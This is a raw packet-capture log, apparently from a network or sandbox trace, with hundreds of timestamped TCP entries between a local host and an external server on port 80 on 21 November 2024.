                                                                                                                                                                              Nov 21, 2024 08:30:36.072514057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.072561026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.073204994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.073329926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.073380947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.074090004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.074337959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.074385881 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.074947119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.075078964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.075131893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.075818062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.075881004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.075926065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.076704979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.076838970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.076883078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.077636003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.077749968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.077790976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.078505039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.078603029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.078663111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.079376936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.079504967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.079547882 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.080285072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.080379009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.080425024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.081154108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.081285000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.081326962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.082030058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.082194090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.082235098 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.082931995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.083013058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.083056927 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.083796024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.083905935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.083946943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.084691048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.084798098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.084866047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.085628986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.085733891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.085779905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.086472034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.086592913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.086642027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.087306976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.087433100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.087482929 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.088233948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.088327885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.088417053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.089107990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.089205027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.089241028 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.089966059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.090087891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.090128899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.090882063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.090933084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.090971947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.091773033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.091855049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.091901064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.092653990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.092735052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.092778921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.093532085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.093616009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.093655109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.094424963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.094506025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.094548941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.095283031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.095396042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.095443964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.096175909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.096205950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.096255064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.097054005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.097166061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.097208977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.097946882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.098011017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.098052025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.098818064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.098944902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.099020958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.099680901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.099805117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.099843025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.100661039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.100749969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.100789070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.101650000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.101735115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.101778984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.102349997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.102454901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.102497101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.103257895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.103343010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.103389978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.104130030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.104217052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.104262114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.105240107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.105375051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.105421066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.106350899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.106408119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.106446028 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.106880903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.106940031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.106977940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.107239962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.107656002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.107781887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.107826948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.108530998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.108637094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.108680964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.109411955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.109523058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.109561920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.110325098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.110476971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.110529900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.111217022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.111306906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.111351013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.112076044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.112188101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.112234116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.112963915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.113111019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.113158941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.113847017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.113897085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.113935947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.114722013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.114849091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.114892960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.115573883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.116605043 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.130903959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.270683050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.270781994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.270842075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.270989895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.271051884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.271112919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.271873951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.272197008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.272275925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.272324085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.273047924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.273149014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.273197889 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.273955107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.274008989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.274095058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.274830103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.274890900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.274972916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.275701046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.275739908 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.275794983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.276563883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.276643038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.276650906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.277446032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.277560949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.277580976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.278362989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.278465033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.278512001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.279217005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.279268026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.279330015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.280129910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.280221939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.280227900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.280999899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.281074047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.281115055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.281872034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.281964064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.282010078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.282763958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.282812119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.282891035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.283654928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.283701897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.283750057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.284529924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.284563065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.284574986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.285439968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.285482883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.285530090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.286294937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.286346912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.286361933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.287193060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.287240028 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.287277937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.288121939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.288160086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.288208008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.288975000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.289021969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.289069891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.289824009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.289889097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.289936066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.290764093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.290812016 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.290900946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.291606903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.291654110 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.291702032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.292473078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.292582035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.292624950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.293422937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.293488979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.293668032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.294255972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.294301033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.294354916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.295142889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.295188904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.295238018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.296025038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.296045065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.296077013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.296926975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.296982050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.297027111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.297828913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.297873020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.297986031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.298671961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.298810959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.298836946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.299524069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.299567938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.299679041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.300491095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.300518036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.300535917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.301405907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.301457882 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.301481962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.301772118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.302196026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.302237034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.302367926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.303086042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.303190947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.303241014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.303982019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.304032087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.304121017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.305139065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.305183887 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.305257082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.305840969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.305885077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.305963993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.306646109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.306674957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.306685925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.307514906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.307555914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.307614088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.308406115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.308442116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.308451891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.309273958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.309350014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.309386015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.310172081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.310317993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.310323954 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.311037064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.311080933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.311083078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.311920881 CET8049762185.215.113.16192.168.2.6
